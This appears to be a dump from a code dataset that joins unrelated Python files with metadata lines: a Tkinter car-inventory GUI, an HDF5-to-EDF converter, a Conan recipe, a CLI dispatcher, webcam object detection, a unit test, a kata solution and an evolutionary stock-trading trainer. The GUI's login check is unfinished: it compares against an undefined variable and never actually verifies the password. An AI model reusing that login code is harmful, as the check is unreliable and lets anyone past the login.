label1 = Label(self.logintop, text = 'User Name', \
bg = self.newcolor).place(relx = .025, rely = .07)
self.username = Entry(self.logintop, bg = self.newcolor)
self.username.place(relx = .45, rely = .08)
label2 = Label(self.logintop, text = 'Password', \
bg = self.newcolor).place(relx = .025, rely = .34)
self.password = Entry(self.logintop, bg = self.newcolor, show = '*')
self.password.place(relx = .45, rely = .35)
button = Button(self.logintop, text = 'Login', command = self.loginvalid, \
bg = self.newcolor).place(relx = .5, rely = .8, \
anchor = 'center')
def loginvalid(self):
self.userget = self.username.get()
self.valid = True
if not path.isfile(getcwd() + f'\\.account\\{self.userget}.json'):
infoinput = messagebox.showinfo('Info', f'Username \'{self.userget}\' hasn\'t already exists')
warning(f'Username \'{self.userget}\' hasn\'t already exists.')
self.valid = False
self.login()
else:
self.decrypt_login(self.password.get())
def decrypt_login(self, password):
loadaccount = Account(f'{self.userget}.json').loadfile()
dsign = new(self.signp, loadaccount[0].encode('utf-8'), digestmod = sha224).hexdigest()
print(compare_digest(sign, dsign))
def popup(self, event):
self.rmenu.post(event.x_root, event.y_root)
def color(self):
self.newcolor = colorchooser.askcolor(self.newcolor, title = 'Choose a color')[1]
if self.newcolor:
Config('color.json').createfile(self.newcolor)
info(f'Edited color config: {self.newcolor}.')
self.root.destroy()
self.__init__()
def create_car(self):
self.get_manufacturer = self.manufacturer.get()
self.get_name = self.name.get()
self.get_year = self.year.get()
if self.rint.get():
self.new_car = ElectricCar(self.get_manufacturer, self.get_name, \
self.get_year)
self.new_car_name = self.new_car.get_descriptive_name()
else:
self.new_car = Car(self.get_manufacturer, self.get_name, self.get_year)
self.new_car_name = self.new_car.get_descriptive_name()
self.valid1 = False
self.valid2 = False
self.valid3 = False
if self.get_manufacturer:
try:
self.get_manufacturer = int(self.get_manufacturer)
except:
pass
if isinstance(self.get_manufacturer, str):
self.valid1 = True
else:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer')
error(f'Invalid Type \'{type(self.get_manufacturer).__name__}\' of manufacturer.')
else:
warninput = messagebox.showwarning('Warning', 'No input of manufacturer')
warning('No input of manufacturer.')
if self.get_name:
try:
self.get_name = int(self.get_name)
except:
pass
if isinstance(self.get_name, str):
self.valid2 = True
else:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_name).__name__}\' of name')
error(f'Invalid Type \'{type(self.get_name).__name__}\' of name.')
else:
warninput = messagebox.showwarning('Warning', 'No input of name')
warning('No input of name.')
if self.get_year:
try:
self.get_year = int(self.get_year)
except:
warntype = messagebox.showerror('Error', f'Invalid Type \'{type(self.get_year).__name__}\' of year')
error(f'Invalid Type \'{type(self.get_year).__name__}\' of year.')
if isinstance(self.get_year, int):
self.valid3 = True
else:
warninput = messagebox.showwarning('Warning', 'No input of year')
warning('No input of year.')
ele = 'eletric car' if self.rint.get() else 'car'
if self.valid1 and self.valid2 and self.valid3:
self.confirm = messagebox.askyesno('Confirm', f'Create new {ele}: \n{self.new_car_name}')
if self.confirm:
Config('cars.json').createfile({'Name': self.new_car_name, \
'Type': ele.title()}, True)
messagebox.showinfo('Successful', f'Successfuly create {ele} \'{self.new_car_name}\'')
info(f'Successfuly create {ele} \'{self.new_car_name}\'.')
else:
self.create_car_gui()
def set_battery_gui(self):
self.batterytop = Toplevel(bg = self.newcolor)
self.batterytop.title('Set Battery -kWh')
self.batterytop.resizable(0, 0)
alignstr = f'250x100+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.batterytop.geometry(alignstr)
self.batterytop.iconbitmap('.\\.image\\car.ico')
self.battery_button1 = Radiobutton(self.cartop, text = '60 -kWh', \
variable = self.rint, bg = self.newcolor, \
value = 0, indicatoron = False).pack()
def create_car_gui(self):
self.cartop = Toplevel(bg = self.newcolor)
self.cartop.title('Create Car')
self.cartop.resizable(0, 0)
alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.cartop.geometry(alignstr)
self.cartop.iconbitmap('.\\.image\\car.ico')
self.radiobutton1 = Radiobutton(self.cartop, text = 'Car', variable = self.rint, \
bg = self.newcolor, value = 0).pack()
self.radiobutton2 = Radiobutton(self.cartop, text = 'Eletric Car', variable = self.rint, \
bg = self.newcolor, value = 1).pack()
label1 = Label(self.cartop, text = 'Car Manufacturer: (Str)', \
bg = self.newcolor).pack()
self.manufacturer = Entry(self.cartop, bg = self.newcolor)
self.manufacturer.pack()
label2 = Label(self.cartop, text = 'Car Name: (Str)', \
bg = self.newcolor).pack()
self.name = Entry(self.cartop, bg = self.newcolor)
self.name.pack()
label3 = Label(self.cartop, text = 'Year: (Int)', \
bg = self.newcolor).pack()
self.year = Spinbox(self.cartop, from_ = localtime()[0] - 15, \
to = localtime()[0] + 1, bg = self.newcolor)
self.year.pack()
button = Button(self.cartop, text = 'Create', command = self.create_car, \
bg = self.newcolor).pack()
def rquit(self):
self.root.destroy()
def CreateFolder(pathcwd):
if not path.exists(getcwd() + '\\%s' % pathcwd):
mkdir(getcwd() + '\\%s' % pathcwd)
def CreateLogFile():
CreateFolder('.log')
basicConfig(format = '%(asctime)s %(levelname)s: %(message)s', \
datefmt = '%Y-%m-%d %H:%M:%S', filename = getcwd() + \
'\\.log\\logs.log', filemode = 'a', level = DEBUG)
class Config():
def __init__(self, filename):
CreateFolder('.config')
self.filename = filename
def createfile(self, msg, ifadd = False):
configfolder = getcwd() + '\\.config\\%s' % self.filename
if ifadd:
with open(configfolder, mode = 'a') as file:
dump(msg, file)
return
with open(configfolder, mode = 'w+') as file:
dump(msg, file)
return
def loadfile(self):
configfolder = getcwd() + '\\.config\\%s' % self.filename
with open(configfolder, mode = 'r') as file:
self.fileinfo = load(file)
return self.fileinfo
class Account():
def __init__(self, filename):
CreateFolder('.account')
self.filename = filename
def createfile(self, msg):
configfolder = getcwd() + '\\.account\\%s' % self.filename
with open(configfolder, mode = 'w+') as file:
dump(msg, file)
return
def loadfile(self):
configfolder = getcwd() + '\\.account\\%s' % self.filename
with open(configfolder, mode = 'r') as file:
self.fileinfo = load(file)
return self.fileinfo
class Car():
def __init__(self, make, model, year):
CreateLogFile()
self.make = make
self.model = model
self.year = year
self.odometer_reading = 0
def get_descriptive_name(self):
self.descriptive = f'{str(self.year)} {self.make} {self.model}'.title()
info(f'Getting car name: {self.descriptive}')
return self.descriptive
def descriptive_name(self):
return f'{str(self.year)} {self.make} {self.model}'.title()
def update_odometer(self, mileage):
if mileage >= self.odometer_reading:
self.odometer_reading = mileage
else:
warning('Rolling back an odometer.')
def read_odometer(self):
return f'This car has {str(self.odometer_reading)} miles on it.'
def get_odometer(self):
info(f'Getting odometer: {self.odometer_reading}')
return self.odometer_reading
def increment_odometer(self, miles):
self.odometer_reading += miles
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
self.battery = Battery(85)
class Battery():
def __init__(self, battery_size = 60):
self.battery_size = battery_size
def describe_battery(self):
return f'This car has a {str(self.battery_size)} -kWh battery.'
def get_range(self):
if self.battery_size == 60:
range = 340
elif self.battery_size == 85:
range = 685
return f'This car can go approximately {str(range)} miles on a full charge.'
class Mainloop():
CreateLogFile()
info('Opened GUI application.')
GUI()
Audi_Q5 = Car('Audi', 'Q5', 2018)
print(Audi_Q5.get_descriptive_name())
Audi_Q5.update_odometer(7884)
print(Audi_Q5.read_odometer())
print()
Tesla_Model3 = ElectricCar('Tesla', 'Model 3', 2020)
print(Tesla_Model3.get_descriptive_name())
Tesla_Model3.update_odometer(397)
print(Tesla_Model3.read_odometer())
print(Tesla_Model3.battery.describe_battery())
print(Tesla_Model3.battery.get_range())
descriptive_dict = {'Name': Audi_Q5.descriptive_name(), \
'Odometer': Audi_Q5.get_odometer()}
print(descriptive_dict)
Config('test.json').createfile(descriptive_dict)
Mainloop()
| 2.546875
| 3
|
convert_data_to_edf.py
|
Dreem-Organization/dreem-learning-open
| 44
|
12777982
|
import os
import pyedflib
import h5py
import pytz
import datetime as dt
import struct
psg_properties = {'digital_max': [32767],
'digital_min': [-32767],
'dimension': ['uV'],
'physical_min': [-800.0],
'physical_max': [800.0],
'prefilter': [''],
'sample_rate': [250],
"transducer": [""]}
def convert_h5_to_edf(h5_path, output_file="psg.edf",psg_properties = psg_properties):
h5 = h5py.File(h5_path, "r")
# Check that all ?
subfolders = ['signals/eeg', 'signals/emg', 'signals/eog']
psg_labels = []
for subfolder in subfolders:
psg_labels.extend([f"{subfolder}/{x}" for x in list(h5[subfolder].keys())])
try:
start_time = pytz.timezone('UTC').localize(
dt.datetime.utcfromtimestamp(h5.attrs["start_time"])
)
except KeyError:
start_time = pytz.timezone('UTC').localize(
dt.datetime.utcfromtimestamp(0)
)
number_of_data_records = int(len(h5[psg_labels[0]]) / 250)
duration = 1
header = (
"0".ljust(8)
+ "".ljust(80)
+ "".ljust(80)
+ start_time.strftime("%d.%m.%y%H.%M.%S")
+ str((len(psg_labels) + 1) * 256).ljust(8)
+ "".ljust(44)
+ str(number_of_data_records).ljust(8)
+ str(duration).ljust(8)
+ str(len(psg_labels)).ljust(4)
)
subheaders = (
"".join([str(x.split('/')[-1]).ljust(16) for x in psg_labels])
+ "".join([str(x).ljust(80) for x in psg_properties['transducer'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['dimension'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['physical_min'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['physical_max'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['digital_min'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['digital_max'] * len(psg_labels)])
+ "".join([str(x).ljust(80) for x in psg_properties['prefilter'] * len(psg_labels)])
+ "".join([str(x).ljust(8) for x in psg_properties['sample_rate'] * len(psg_labels)])
+ "".ljust(32) * len(psg_labels)
)
edf_path = output_file
with open(edf_path, "wb") as f:
f.write(bytes(header, "UTF-8"))
f.write(bytes(subheaders, "UTF-8"))
def transform(x, min, max):
if max < min:
min, max = max, min
x = x.clip(min, max)
return (((x - min) / (max - min)) * (2 ** 16 - 1) - (2 ** 15)).astype(int)
data_transformed = []
for i, data_path in enumerate(psg_labels):
data_transformed += [transform(h5[data_path][:], psg_properties['physical_min'][0], psg_properties['physical_max'][0])]
for i in range(number_of_data_records):
data = []
for k, signal_transformed in enumerate(data_transformed):
data += list(signal_transformed[i * int(psg_properties['sample_rate'][0]): int(psg_properties['sample_rate'][0] * (i + 1))])
data_to_write = struct.pack("h" * len(data), *data)
f.write(data_to_write)
return edf_path
| 2
| 2
|
conanfile.py
|
mohamedghita/conan-fcl
| 0
|
12777983
|
<reponame>mohamedghita/conan-fcl
from conans import ConanFile, CMake, tools
import shutil
import os.path
class FclConan(ConanFile):
name = "fcl"
version = "0.5.0"
license = "BSD"
author = "<NAME> (<EMAIL>)"
url = "https://github.com/mohamedghita/conan-fcl"
description = "conan.io package for flexible-collision-library/fcl https://github.com/flexible-collision-library/fcl"
topics = ("fcl", "collision")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"build_tests": [True, False]
}
default_options = {
"shared": True,
"build_tests": False
}
requires = "eigen/3.3.7@conan/stable", "libccd/2.1@radalytica/stable"
build_requires = "cmake_installer/[>=3.14.4]@conan/stable", "pkg-config_installer/0.29.2@bincrafters/stable"
generators = "cmake"
def source(self):
extension = ".zip" if tools.os_info.is_windows else ".tar.gz"
url = "https://github.com/flexible-collision-library/fcl/archive/%s%s" % (self.version, extension)
tools.get(url)
shutil.move("fcl-%s" % self.version, "fcl")
tools.replace_in_file("fcl/CMakeLists.txt", "project(fcl CXX C)",
'project(fcl CXX C)\n' +
'include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)\n' +
'conan_basic_setup()\n')
#if self.settings.compiler.cppstd == "17":
tools.replace_in_file("fcl/include/fcl/math/math_details.h", "register", " ")
def _fcl_cmake_definitions(self, package_folder, build_folder):
# CCD_LIBRARY_DIRS
cmake_defs = {}
cmake_defs["CCD_INCLUDE_DIRS"] = self.deps_cpp_info["libccd"].includedirs
cmake_defs["CCD_LIBRARY_DIRS"] = self.deps_cpp_info["libccd"].libdirs
cmake_defs["FCL_BUILD_TESTS"] = 'ON' if self.options.build_tests else 'OFF'
cmake_defs["FCL_STATIC_LIBRARY"] = 'OFF' if self.options.shared else 'ON'
if build_folder:
cmake_defs['EXECUTABLE_OUTPUT_PATH'] = os.path.join(build_folder, "bin") # points to testing executables. testing is executed during conan build
if package_folder:
cmake_defs["CMAKE_INSTALL_PREFIX"] = package_folder
return cmake_defs
def _configure_cmake(self, package_folder=None, build_folder=None):
WARNING_FLAGS = '' # '-Wall -Wextra -Wnon-virtual-dtor -pedantic -Wshadow'
if self.settings.build_type == "Debug":
# debug flags
cppDefines = '-DDEBUG'
cFlags = '-g' + ' ' + WARNING_FLAGS
cxxFlags = cFlags + ' ' + cppDefines
linkFlags = ''
else:
# release flags
cppDefines = '-DNDEBUG'
cFlags = '-v -O3 -s' + ' ' + WARNING_FLAGS
cxxFlags = cFlags + ' ' + cppDefines
linkFlags = '-s' # Strip symbols
cmake = CMake(self)
cmake.verbose = False
# put definitions here so that they are re-used in cmake between
# build() and package()
cmake.definitions["CONAN_C_FLAGS"] += ' ' + cFlags
cmake.definitions["CONAN_CXX_FLAGS"] += ' ' + cxxFlags
cmake.definitions["CONAN_SHARED_LINKER_FLAGS"] += ' ' + linkFlags
cmake_defs = self._fcl_cmake_definitions(package_folder, build_folder)
cmake_defs["CMAKE_POSITION_INDEPENDENT_CODE"] = "ON"
cmake.configure(defs=cmake_defs, source_folder=os.path.join(self.build_folder, "fcl"))
return cmake
def build(self):
vars = {'PKG_CONFIG_PATH': os.path.join(self.deps_cpp_info["libccd"].rootpath, 'lib', 'pkgconfig')}
with tools.environment_append(vars):
cmake = self._configure_cmake(build_folder=self.build_folder)
cmake.build()
if self.options.build_tests:
cmake.test()
def package(self):
cmake = self._configure_cmake(package_folder=self.package_folder)
cmake.install()
def package_info(self):
self.cpp_info.includedirs = ['include'] # Ordered list of include paths
self.cpp_info.libs = [self.name] # The libs to link against
self.cpp_info.libdirs = ['lib'] # Directories where libraries can be found
| 1.742188
| 2
|
opskitcl.py
|
surfkansas/opskit
| 0
|
12777984
|
<gh_stars>0
import argparse
import importlib
import os
import sys
def build_arg_parser():
arg_parser = argparse.ArgumentParser(add_help=False)
arg_parser.add_argument('product', nargs='?', default=None)
arg_parser.add_argument('action', nargs='?', default=None)
arg_parser.add_argument('--help', action='store_true')
return arg_parser
def show_help(args, arg_parser):
if args.product is None:
print()
print('usage: opskit <product> <action> [--help] [[action args]]')
print()
return
else:
module_name = 'opskit_{0}'.format(args.product.replace('-', '_'))
try:
module_instance = importlib.import_module(module_name)
module_path = module_instance.__path__[0]
help_name = 'help.txt'
if args.action is not None:
help_name = 'help_{0}.txt'.format(args.action.replace('-', '_'))
help_path = os.path.join(module_path, help_name)
with open(help_path, 'r') as help_file:
print()
print(help_file.read())
print()
except:
print()
if args.action is not None:
print('Unable to show help for module: {0}, action: {1}'.format(module_name, args.action))
else:
print('Unable to show help for module: {0}'.format(module_name))
print()
def run_action(args):
module_name = 'opskit_{0}'.format(args.product.replace('-', '_'))
module_instance = importlib.import_module(module_name)
class_instance = getattr(module_instance, args.action.replace('-', '_'))
action_instance = class_instance()
action_instance.initialize(build_arg_parser())
action_instance.run_action()
def main():
sys.path.append('.')
arg_parser = build_arg_parser()
args, unknown = arg_parser.parse_known_args()
if args.help or args.product is None or args.action is None:
show_help(args, arg_parser)
else:
run_action(args)
if __name__ == '__main__':
main()
| 2.765625
| 3
|
rt_od_force.py
|
Cybernorse/credit-card-owner-verification-and-indoor-security-system-with-face-recognition-and-object-detection
| 0
|
12777985
|
import cv2
import numpy as np
import os
# import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import pathlib
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_model(model_name):
model = tf.saved_model.load(
'/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/')
return model
PATH_TO_LABELS = '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/labelmap.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(
PATH_TO_LABELS, use_display_name=True)
model_name = 'saved_model.pb'
detection_model = load_model(model_name)
def run_inference_for_single_image(model, image):
image = np.asarray(image)
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(image)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Run inference
model_fn = model.signatures['serving_default']
output_dict = model_fn(input_tensor)
# All outputs are batches tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
output_dict['num_detections'] = num_detections
# detection_classes should be ints.
output_dict['detection_classes'] = output_dict['detection_classes'].astype(
np.int64)
# Handle models with masks:
if 'detection_masks' in output_dict:
# Reframe the the bbox mask to the image size.
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
output_dict['detection_masks'], output_dict['detection_boxes'],
image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5,
tf.uint8)
output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()
return output_dict
def show_inference(model, frame):
# take the frame from webcam feed and convert that to array
image_np = np.array(frame)
# Actual detection.
output_dict = run_inference_for_single_image(model, image_np)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks_reframed', None),
use_normalized_coordinates=True,
line_thickness=2)
return(image_np)
video_capture = cv2.VideoCapture(0)
while True:
# Capture frame-by-frame
re, frame = video_capture.read()
Imagenp = show_inference(detection_model, frame)
cv2.imshow('object detection', Imagenp)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
# cv2.resize(Imagenp, (800,600)
| 2.421875
| 2
|
tests/test_pyres_tasks.py
|
gingerlime/remotecv
| 1
|
12777986
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mock
from preggy import expect
from unittest import TestCase
from tests import read_fixture
from remotecv.pyres_tasks import DetectTask
from remotecv.utils import config
class DetectTaskTestCase(TestCase):
def test_should_run_detector_task(self):
store_mock = mock.Mock()
config.loader = mock.Mock(load_sync=read_fixture)
config.store = store_mock
config.store.ResultStore = mock.Mock(return_value=store_mock)
DetectTask.perform('all', 'multiple_faces_bw.jpg', 'test-key')
call = store_mock.store.call_args[0]
expect(call[0]).to_equal('test-key')
expect(call[1]).to_be_greater_than(20)
expect(call[1][0][0]).to_be_numeric()
expect(call[1][0][1]).to_be_numeric()
expect(call[1][0][2]).to_be_numeric()
expect(call[1][0][3]).to_be_numeric()
| 2.25
| 2
|
Python/2_square(n)_sum.py
|
josefrank/codewars
| 0
|
12777987
|
<gh_stars>0
"""
Complete the square sum function so that it squares each number passed
into it and then sums the results together.
For example, for [1, 2, 2] it should return 9 because 1^2 + 2^2 + 2^2 = 9
"""
# Solution
def square_sum(numbers):
# Simple function that uses a For loop and iterates over a list.
sum = 0
for number in numbers:
sum += number ** 2
return sum
| 4.0625
| 4
|
src/training_managers/evolutionary_computation_trainer.py
|
Freitacr/ML-StockAnalysisProject
| 0
|
12777988
|
"""
"""
from configparser import ConfigParser, SectionProxy
from os import path
import os
from typing import List, Tuple, Any, Optional, Dict
import numpy as np
import tqdm
from general_utils.config import config_util, config_parser_singleton
from general_utils.exportation import csv_exportation
from general_utils.logging import logger
from data_providing_module import configurable_registry, data_provider_registry
from data_providing_module.data_providers import data_provider_static_names
from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation
CONSUMER_ID = "Evolutionary Computation Trainer"
_ENABLED_CONFIGURATION_IDENTIFIER = 'enabled'
_EXAMPLE_COMBINATION_FACTOR_IDENTIFIER = 'Periods Per Example'
_TDP_BLOCK_LENGTH_IDENTIFIER = "trend deterministic data provider block length"
_NUM_EPOCHS_IDENTIFIER = "Number of Epochs"
_NUM_INDIVIDUALS_IDENTIFIER = "Number of Individuals in Evolutionary Population"
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER = "Model Saving Epoch Interval"
_TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER = "Days Per Example"
_MUTATION_CHANCE_IDENTIFIER = "Mutation Chance Per Genome"
_MUTATION_MAGNITUDE_IDENTIFIER = "Mutation Magnitude"
_CROSSOVER_CHANCE_IDENTIFIER = "Crossover Chance Per Genome"
_CONFIGURABLE_IDENTIFIERS = [_ENABLED_CONFIGURATION_IDENTIFIER, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER,
_TDP_BLOCK_LENGTH_IDENTIFIER, _NUM_EPOCHS_IDENTIFIER, _NUM_INDIVIDUALS_IDENTIFIER,
_MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER, _TRAINING_PERIODS_PER_EXAMPLE_IDENTIFIER,
_MUTATION_CHANCE_IDENTIFIER, _MUTATION_MAGNITUDE_IDENTIFIER, _CROSSOVER_CHANCE_IDENTIFIER]
_CONFIGURATION_DEFAULTS = ['False', '22', '2520', '100', '100', '5', '5', '.1', '.15', '.5']
def string_serialize_predictions(predictions) -> str:
ret_str = ""
ticker_prediction_template = "{}:{}\n"
individual_prediction_template = "{}:\n\t\tBuy: {}\n\t\tSell: {}\n\t\tAccuracies: {:.2f}, {:.2f}"
for ticker, data in predictions.items():
ticker_predictions, accuracies = data
serialized_individual_predictions = []
for i in range(len(ticker_predictions)):
indicate_buy = ticker_predictions[i][0] == 1
indicate_sell = ticker_predictions[i][1] == 1
serialized_individual_predictions.append(
individual_prediction_template.format(i+1, indicate_buy, indicate_sell,
accuracies[i][0], accuracies[i][1])
)
expanded_template = ticker_prediction_template.format(ticker, "\n\t{}" * len(ticker_predictions))
ret_str += expanded_template.format(*serialized_individual_predictions)
return ret_str
def export_predictions(predictions, output_dir) -> None:
out_file = output_dir + path.sep + "ec.csv"
exportation_columns = []
for ticker, prediction_data in predictions.items():
actual_predictions, observed_accuracies = prediction_data
actual_predictions = np.where(actual_predictions == 1, True, False)
exportation_columns.append((ticker, "", ""))
for i in range(len(actual_predictions)):
exportation_columns.append((",Model:", str(i)))
exportation_columns.append((",Buy:", str(actual_predictions[i][0])))
exportation_columns.append((",Buy Accuracy:", str(observed_accuracies[i][0])))
exportation_columns.append((",Sell:", str(actual_predictions[i][1])))
exportation_columns.append((",Sell Accuracy:", str(observed_accuracies[i][1])))
with open(out_file, 'w') as handle:
for column in exportation_columns:
handle.write(",".join(column) + '\n')
def prediction_truth_calculation(predictions: List[np.ndarray],
closing_prices: List[float],
num_days_per_prediction: int = 5):
prediction_entry = Tuple[List[np.ndarray], float, List[List[bool]]]
prediction_array: List[Optional[prediction_entry]] = [None] * (num_days_per_prediction+1)
current_index = 0
ret = []
for i in range(len(predictions)):
for j in range(1, len(prediction_array)):
index = (j + current_index) % len(prediction_array)
if prediction_array[index] is None:
continue
for k in range(len(prediction_array[index][0])):
prediction, reference_price, prediction_truths = prediction_array[index]
prediction = prediction[k]
prediction_truths = prediction_truths[k]
if reference_price < closing_prices[i]:
if prediction[0]:
prediction_truths[0] = True
if not prediction[1]:
prediction_truths[1] = True
elif reference_price > closing_prices[i]:
if not prediction[0]:
prediction_truths[0] = True
if prediction[1]:
prediction_truths[1] = True
if prediction_array[current_index] is not None:
prediction_truth = prediction_array[current_index][-1]
ret.append(prediction_truth)
prediction_array[current_index] = ([*predictions[i]], closing_prices[i], [[False, False]] * len(predictions[i]))
current_index += 1
current_index %= len(prediction_array)
return ret
def extract_accuracy_from_prediction_truths(prediction_truths: List[List[List[bool]]]):
ret = np.zeros((len(prediction_truths[0]), len(prediction_truths[0][0])))
for i in range(len(prediction_truths)):
for prediction_index, truths in enumerate(prediction_truths[i]):
for index, truth in enumerate(truths):
if truth:
ret[prediction_index][index] += 1
ret /= len(prediction_truths)
return ret
class EvolutionaryComputationManager(data_provider_registry.DataConsumerBase):
def __init__(self):
super().__init__()
configurable_registry.config_registry.register_configurable(self)
self.__contained_population: Optional[TradingPopulation] = None
self.__periods_per_example = 5
self.__num_epochs = 100
self.__num_individuals = 100
self.__save_interval = 5
self.__mutation_chance = .1
self.__mutation_magnitude = .15
self.__crossover_chance = .5
def consume_data(self, data: Dict[str, Tuple[np.ndarray, List[float]]], passback, output_dir):
out_dir = output_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(out_dir):
os.mkdir(out_dir)
previous_model_file = out_dir + path.sep + "evolution_individuals.ecp"
if path.exists(previous_model_file):
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(previous_model_file)
else:
num_indicators = len(data[next(iter(data.keys()))][0])
input_shape = (num_indicators, self.__periods_per_example)
self.__contained_population = TradingPopulation(input_shape, 1000, self.__num_individuals,
self.__mutation_chance, self.__mutation_magnitude,
self.__crossover_chance)
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
self.__train_model(consolidated_data, previous_model_file)
self.__contained_population.save(previous_model_file)
def __print_best_fitness_by_ticker(self, best_fitness_by_ticker: Dict[str, List[float]]) -> None:
output_template = "{ticker}:\n\t{:.2f}\n\t{:.2f}\n\t{:.2f}\n"
for ticker, fitness in best_fitness_by_ticker.items():
logger.logger.log(logger.INFORMATION, output_template.format(
ticker=ticker, *fitness
))
def __train_model(self, consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]], previous_model_file: str):
for i in tqdm.tqdm(range(self.__num_epochs)):
best_fitness_by_ticker = {}
for ticker, ticker_data in consolidated_data.items():
daily_data, closing_prices = ticker_data
best_fitness = self.__contained_population.train(daily_data, 1, closing_prices)
best_fitness_by_ticker[ticker] = best_fitness
self.__print_best_fitness_by_ticker(best_fitness_by_ticker)
if i % self.__save_interval == 0:
self.__contained_population.save(previous_model_file)
self.__contained_population.save(previous_model_file)
def predict_data(self, data, passback, in_model_dir):
in_dir = in_model_dir + path.sep + 'evolutionary_computation_models'
if not path.exists(in_dir):
raise FileNotFoundError("Model storage directory for EC prediction does not exist. Please run"
"Model Creation Main without the prediction flag set to True, and with the"
"EC Manager's Enabled config to True to create models."
)
self.__contained_population = TradingPopulation((0, 0), 0, 0)
self.__contained_population.load(in_dir + path.sep + 'evolution_individuals.ecp')
consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
for ticker, ticker_data in data.items():
daily_data, closing_prices = ticker_data
consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
predictions = {}
for ticker, prediction_data in consolidated_data.items():
daily_data, closing_prices = prediction_data
model_predictions = []
for i in range(len(daily_data)):
prediction = self.__contained_population.predict(daily_data[i])
model_predictions.append(prediction)
truths = prediction_truth_calculation(model_predictions[:-1], closing_prices)
accuracies = extract_accuracy_from_prediction_truths(truths)
prediction = self.__contained_population.predict(daily_data[-1])
predictions[ticker] = (prediction, accuracies)
return predictions
def load_configuration(self, parser: "ConfigParser"):
section = config_util.create_type_section(parser, self)
for identifier in _CONFIGURABLE_IDENTIFIERS:
if not parser.has_option(section.name, identifier):
self.write_default_configuration(section)
enabled = parser.getboolean(section.name, _ENABLED_CONFIGURATION_IDENTIFIER)
self.__periods_per_example = parser.getint(section.name, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER)
self.__num_individuals = parser.getint(section.name, _NUM_INDIVIDUALS_IDENTIFIER)
self.__num_epochs = parser.getint(section.name, _NUM_EPOCHS_IDENTIFIER)
self.__save_interval = parser.getint(section.name, _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER)
self.__mutation_chance = parser.getfloat(section.name, _MUTATION_CHANCE_IDENTIFIER)
self.__mutation_magnitude = parser.getfloat(section.name, _MUTATION_MAGNITUDE_IDENTIFIER)
self.__crossover_chance = parser.getfloat(section.name, _CROSSOVER_CHANCE_IDENTIFIER)
block_length = parser.getint(section.name, _TDP_BLOCK_LENGTH_IDENTIFIER)
if enabled:
data_provider_registry.registry.register_consumer(
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
self,
[block_length],
data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
keyword_args={'ema_period': [10, 15, 20]},
data_exportation_function=export_predictions,
prediction_string_serializer=string_serialize_predictions
)
def write_default_configuration(self, section: "SectionProxy"):
for i in range(len(_CONFIGURABLE_IDENTIFIERS)):
if not _CONFIGURABLE_IDENTIFIERS[i] in section:
section[_CONFIGURABLE_IDENTIFIERS[i]] = _CONFIGURATION_DEFAULTS[i]
def construct_examples(self, daily_data: np.ndarray, closing_prices: List[float]) -> Tuple[np.ndarray, List[float]]:
ret_daily_data = np.zeros((
daily_data.shape[1] - self.__periods_per_example + 1,
len(daily_data),
self.__periods_per_example
))
for i in range(self.__periods_per_example, daily_data.shape[1]+1):
ret_daily_data[i - self.__periods_per_example] = daily_data[:, i - self.__periods_per_example: i]
return ret_daily_data, closing_prices[self.__periods_per_example-1:]
if "testing" not in os.environ:
consumer = EvolutionaryComputationManager()
| 2.03125
| 2
|
homeassistant/components/wiffi/wiffi_strings.py
|
